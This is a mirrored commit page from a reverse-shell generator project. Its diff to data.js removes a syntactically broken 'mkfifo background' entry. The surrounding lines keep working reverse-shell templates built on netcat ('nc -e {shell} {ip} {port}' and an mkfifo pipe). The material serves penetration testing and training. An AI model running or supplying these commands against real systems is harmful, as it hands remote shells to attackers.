mirror of
https://github.com/0dayCTF/reverse-shell-generator.git
synced 2024-12-18 19:06:09 +00:00
Update data.js
Fixing
This commit is contained in:
parent
f509313697
commit
ae0e3e49eb
@ -50,11 +50,6 @@ const reverseShellCommands = withCommandType(
|
||||
"command": "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|{shell} -i 2>&1|nc {ip} {port} >/tmp/f",
|
||||
"meta": ["linux", "mac"]
|
||||
},
|
||||
{
|
||||
"name:" "mkfifo background",
|
||||
"command" "(mkfifo \/tmp\/MmE1M; nc {ip} {port} 0<\/tmp\/MmE1M | {shell} >\/tmp\/MmE1M 2>&1; rm \/tmp\/MmE1M) &",
|
||||
"meta" ["linux", "mac"]
|
||||
},
|
||||
{
|
||||
"name": "nc -e",
|
||||
"command": "nc -e {shell} {ip} {port}",
|
||||
|
Loading…
Reference in New Issue
Block a user